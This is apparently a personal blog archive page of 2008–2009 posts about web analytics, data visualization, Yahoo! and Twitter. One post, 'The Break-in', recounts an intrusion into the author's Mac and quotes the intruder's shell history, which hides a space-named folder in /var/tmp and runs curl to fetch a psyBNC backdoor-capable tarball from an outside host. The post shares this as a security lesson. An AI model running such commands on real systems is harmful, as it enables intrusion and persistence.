bobpage.net

Is This the Future of Web Analytics?

January 11th, 2009 by Bob Page
Respond

Long ago I mentioned what I called “vertical analytics” and how blogs may be the next analytics frontier. Fast forward to the present, and blog analytics are “been there, done that.” (The product demo I saw in a hotel room at SES never saw the light of day; the originator went on to other things – and remains active in “general” web analytics.)

bandmetrics-badge.pngI still think vertical analytics is bound to happen. Witness Atlanta-based Indie Music, whose service Band Metrics — “Analytics For The Music Industry™”, scored angel financing back in November. More than one press report about the financing used a variant of the phrase “Google Analytics of the music industry.”

Compared with some of the graybeards of Business Intelligence, the Web Analytics “industry” has not yet left adolescence. But I think many of the lessons learned in the greater web analytics field, combined with more powerful machines and a greater “popular culture” around number crunching, are going to lead to analytics for very specialized fields. At a minimum, it might move us away from generic tools that look at the Web to tools that have specific knowledge of a particular business — kinda like a specific solution for scheduling & billing for dentists vs. bringing in Oracle Applications and Accenture. What can be bad about that?

Could this be a new analytics growth opportunity, or perhaps just a land grab? Here’s a thought experiment: check out XXXanalytics.com (where XXX is whatever interesting business you can think of) and see if it’s already taken. I tried a half-dozen while composing this post and I was surprised how many were already claimed…

(Interestingly, XXXanalytics.com itself is not taken, nor is dentistanalytics.com)

4 Comments

New Visualization Sites, Tools and Ideas

January 4th, 2009 by Bob Page
Respond

If there’s one thing better than having lots of data, it’s probably visualizing it.

I’ve been coming across new sites and new ideas for visualizing data, and thought I’d mention a few.

One of the things I love about the New York Times is their smart visualizations. The interactive graphic A Year of Heavy Losses was a huge hit last fall (even if the data was scary as hell) as the financial meltdown was unfolding. Treemaps can be difficult to understand, but this one nailed it.

screenshot_06.gif

Even the Times’ day-to-day infographics can be a pleasure to look at. Did you know that the NYT has a Visualization Lab where you can make your own visualizations? It uses the many eyes technology from IBM.

FlowingData explores many visual aspects of data. If you haven’t seen their visualization of Watching the Growth of Walmart Across America, (which uses the Modest Maps library) I highly recommend it — but the site has a lot more to discover.

walmart-spread.gif

Jeff Clark over at Neoformix continues to produce thought-provoking visualizations, many full of beautiful insight, like this contrast of two speeches, and some, like his visualization of Obama’s victory speech, are just plain “hang on the wall” beautiful (politics aside). I spend way too much time at Neoformix. Rather than single out one post, check out his Neoformix Review 2008 and see if you’re not intrigued. Jeff also links to other interesting visualization sites and projects.

supertuesday.gif

Infographics should tell a story. Seeing a map of the US with red and blue states doesn’t really give the full scale of how the election went. Mark Newman, however, does a good job showing how using the geographic area is the wrong way to visualize the data, and coming up with better suggestions.

cartogram.gif

Tim Showers’ visualization discussions are worth checking out. I particularly liked his post on the challenges of visualizing multi-level data .

multipie.gif

The TheStatBot does various dives into data that doesn’t normally get the spotlight, such as what post-processing software gets used on Flickr. Here’s a Twitter Wordle they did of Leo Laporte’s various tweets:

leo-wordle.gif

And .. if you like infoclutter (and we all do, sometimes, right?), check out this dashboard!

Finally, if you’ve made it this far: not really a data visualization, but a fascinating time-lapse movie of a four seasons in one 40-second video.

screenshot_02.gif

Have you seen other interesting visualization ideas?

2 Comments

In 2009

December 31st, 2008 by Bob Page
Respond

More fit / Less pizza

More photographs / Less pictures

More Tinderbox and OmniFocus / Less productivity pr0n

More action / Less analysis

More blog posts / Less excuses

More technology / Less meetings

 

May you have appropriately more and less in 2009.

No Comments.

Graphing Yahoo! News Elections Traffic

November 13th, 2008 by Bob Page
Respond

Just a quick graph that shows daily page views to Yahoo! News. The green line shows the week before the US elections, while the week of the elections is in blue.Y! News PVs, US Elections

This comes from our internal numbers; for “competitive reasons” I removed the legend indicating volume — but you can see the site was much busier than the previous week. Uniques, PVs, and PVs per unique all were way up.

TechCrunch showed some data from Hitwise on market share of visits for Nov 4. It’s a little strange that Yahoo! wasn’t listed in the TechCrunch graph, even though Yahoo! placed first overall. Also interesting that the Drudge Report was so high. Here are the top 10 .. for more, see Media Life Magazine .

Hitwise ranking of election sites

No Comments.

The Break-in

July 24th, 2008 by Bob Page
Respond

The Scary Door by musicalwds

I am so ashamed.

I was once a system & network manager, so I know about things like bad passwords and scanning software. Later, I built firewalls for Sun. Lately I’ve lectured on the importance of locking down your web analytics data, and the precautions you need to take. So imagine my shock to discover that my home desktop Mac was broken into. Yep. I had enabled remote logins through my firewall, which is innocent enough, but during a fit of debugging some USB problems, I set up new user named “test” with a password of .. you guessed it. I remember at the time thinking “don’t pick ‘test’ as a user name, and certainly don’t use it as the password” but I was in a hurry and I did it anyway. I finished my debugging, but forgot about the account.

Oh, and of course, I set it up with full administrator privileges.

Tonight I’m poking through my log files (I’m still debugging for the source of this USB error on my system, it’s driving me nuts), and I notice that some scanning software came by today, trying to log into zillions of accounts. I was smugly scrolling through the list of user names it was trying until I got to “test” and … it didn’t log in. It didn’t know the password. I first thought, holy crap, I left that account enabled. Then I thought, how could it not guess the password?

The reason: because somebody else had, three days ago. And changed it.

I brought up a Terminal window, and typed “last test” which gives me a list of the previous logins. Sure enough, some fine program/human had logged in to my system three days ago, and stayed for 1 minute. So I went to the “test” home directory, where I conveniently found a list of what happened when they logged in:

1. w
2. passwd
3. uname -a
4. exit
5. cd /var/tmp
6. mkdir " "
7. cd " "
8. curl -O geocities.com/myhael_ilie/psyd,tar.gz
9. curl -O geocities.com/myhael_ilie/psyd,tar.gz
10. exit

Translation:

  1. See who’s on.
  2. Change the password for user “test”.
  3. See what kind of system this is.
  4. Logout.
  5. Go to a folder commonly used for temporary files.
  6. Create a folder named ” ” (just a single space).
  7. Change to that folder.
  8. Download a file from the web.
  9. Try the download again.
  10. Give up, and log out.

So why did the curl commands fail? It’s because I use Little Snitch, which asks my permission every time a random command tries to access the Internet. Since I wasn’t at the computer at the time, I never gave my OK, and Little Snitch prevented the ‘curl’ from working. The person would have seen this:

curl: (7) Failed to connect to 66.218.77.68: Host is down

So what was in psyd,tar.gz? Well, actually it’s a typo. The real name doesn’t have a comma in it, but the person who logged in didn’t notice the mistake because of the “host is down” message. I grabbed the correct file and took a look at it. It is psyBNC, an “IRC bouncer”, but can be used to install backdoors and other nastiness. The file contains the complete source code, as well as a fully-functioning Mac executable.

Fortunately, that’s the end of the story. Several lessons here, ones which I’ve told others far too many times:

  1. Do what you can to prevent break-ins.
  2. Log everything so you can figure out how the inevitable break-in happened.
  3. Convenience is often at the expense of security

I was incredibly lucky. A simple sudo bash would have given this person root access, and they could have erased everything on my system, or worse. In fact, they could have, and then erased all traces of what they did, but I have enough logging and checks to know that they didn’t do anything but what’s described above.

I humbly admit all of this in the hope that you can learn from my near miss.

And yes, I removed the “test” account.

3 Comments

Dancing about Architecture

April 25th, 2008 by Bob Page
Respond

Blogging about Twitter. Reminds me that Talking about music is like dancing about architecture …and I’ve already blogged about Twitter more than once. While we’re a good year and a half into Twitter, and it’s been mildly entertaining, I’m starting to see value now. So this post is for the folks still scratching their heads.

There’s a critical mass (or tipping point, if you are so inclined) of people you need to follow such that a micro-community emerges. Once that happens, you get two things. One is quick notification of important/interesting events/news/blog posts. In fact since I’m following so many web analytics folks, I no longer have to rely on my RSS reader to bring me the big stories — the community points them out. Of course you need to be following the right people for your interests – people who say interesting things.

Second is ability to get feedback. I admit I don’t use this a lot, but it can be handy, depending on your community size. Of course it didn’t help me find a 13-year old copy of Windows…

(In response to Eric’s comment in one of his posts, yeah, my “lazy blogger” tweet to him, welcoming him to Twitter, was paraphrased from something June said to me at eMetrics last spring, about Twitter being the lazy man’s blog. At the time I couldn’t tell if she felt it was a compliment or a condemnation, but now I know.)

1 Comment

Yahoo! is hiring (really!)

April 22nd, 2008 by Bob Page
Respond

200804211649.jpg

What with all the news about Yahoo! laying off people, you could be forgiven for thinking that the company isn’t hiring. But in fact, it is. The company “de-invested” in several areas, but is increasing investment in others. Even the data team changed a number of projects, which impacted some people. But Y! is hiring, and the data team is hiring. In fact we really need help, especially if you know C++ and/or SQL. Details are at http://careers.yahoo.com/

No Comments.

Baseball, Sabermetrics, Freakonomics and Web Analytics

April 9th, 2008 by Bob Page
Respond

SABR logoGreat read over on the Freakonomics blog with Bill James, the data wizard for the Boston Red Sox. A few choice quotes rang true for me; he could have been talking about web analytics:

I would say generally that baseball statistics are always trying to mislead you, and that it is a constant battle not to be misled by them.

We haven’t figured out anything yet. A hundred years from now, we won’t have begun to have the game figured out.

and to who should have a larger role in player evaluations, scouts or stats guys:

Ninety-five percent scouts, five percent stats. [...] the knowledge of who will improve is vastly more important than the knowledge of who is good. Stats can tell you who is good, but they’re almost 100 percent useless when it comes to who will improve.

No Comments.

Yahoo! acquires IndexTools

April 9th, 2008 by Bob Page
Respond

iPhone in Hungary
Today Yahoo! and IndexTools announced that Yahoo! is acquiring IndexTools. Here is the official press release.

I’m really jazzed about it. IndexTools is a great group that’s been laser focused on the stuff that customers care about. They have a very practical attitude towards their products. Because they started in 2000, they learned from the pioneers, and built a deep analytics system that really works well. That much was clear as soon as we popped the hood and poked around inside .. unlike a lot of their competition, they didn’t have an old and a new product that they bolted together.

So does this mean we’re going to do “Yahoo! Analytics”, and try to “steal” web sites away from Google Analytics or the commercial web analytics vendors? See, that’s not what this is about. Yahoo! has stated its desire to be a “partner of choice”, and as the new Yahoo! strategy began to sink in, it became clear that the new Yahoo! was going to need to offer a new level of products to its partners. We have many, many thousands of small and medium businesses partnering with us now, and we want to make sure they have the tools they need. We’ve already announced an open strategy where developers can take advantage of Yahoo! products and services; we want to make sure they get the analytics they need too. Yahoo! has so many partners in so many places that can benefit from this technology, it became clear — even obvious — it was now the right thing to do.

Yeah, we still have a team working on analytics solutions for our “owned and operated” world — Yahoo! is too big a customer for IndexTools, or any other commercial vendor for that matter. There’s a world of difference between massive scale for one huge customer, and massive scale for a huge number of small and medium-sized customers. Now we have both.

As for what this means for the web analytics industry, I’ll leave that to the pundits, analysts and fortune tellers.

Here’s some of the combined team after a day of meetings at IndexTools.

IndexTools-Yahoo! Dinner

(and yes, that’s Dennis at the head of the table, farthest away from the camera.)

Some reactions from around the web:

2 Comments

Is Web Analytics Easy or Hard?

April 8th, 2008 by Bob Page
Respond

easy button from spackletoe on flickrIn the words of Bill Clinton, “it depends on what you mean by …”

The web analytics is easy / hard discussion among various thought leaders has been interesting but I can’t help but think a little self-serving. I had a long preachy post ready to go but even I was bored by it. Instead, let me offer some observations:

Technology:

  • Web data is messy. It doesn’t fit into cubes (think path analysis by segment) for instance. So it requires special handling.
  • Web data is noisy. Think robots and cookie deletion.
  • Web analytics is nonstandard. Despite the efforts of the IAB, WAA and others, nobody can say “we use the computation standard to determine this” – because there is no computation standard. Count web 2.0 for me…

If you want to chase the rabbit down the hole, you’ll decide that web analytics is hard. if you want to defer these kinds of things to a tool vendor who will sell you turnkey “best practices” then web analytics is easy.

Process:

  • In business, speed of deployment is king. Thus it’s easier to look at pre-built reports than create them from scratch.
  • Lack of integration with the business goals means lack of actionability. Most analytics is like driving by looking into the glove box – interesting but irrelevant.
  • As a result of the first two, there’s an emphasis on quantitative over qualitative analysis — which means there very little “analytics” at all, just metrics trending.
  • When you don’t first design your analysis from business goals, you grab as much data as you can, and pick and choose the data that supports your hypothesis — either you’re in report hell, or analysis paralysis. For a very visceral example of this, look at how most people do experimentation.

If you design your analytics to meet your strategy, and staff for it, the implementation is long (and complex, yes) but the resulting analytics are easy. If you want to defer to a tool vendor who will sell you turnkey “best practices” then web analytics is hard.

1 Comment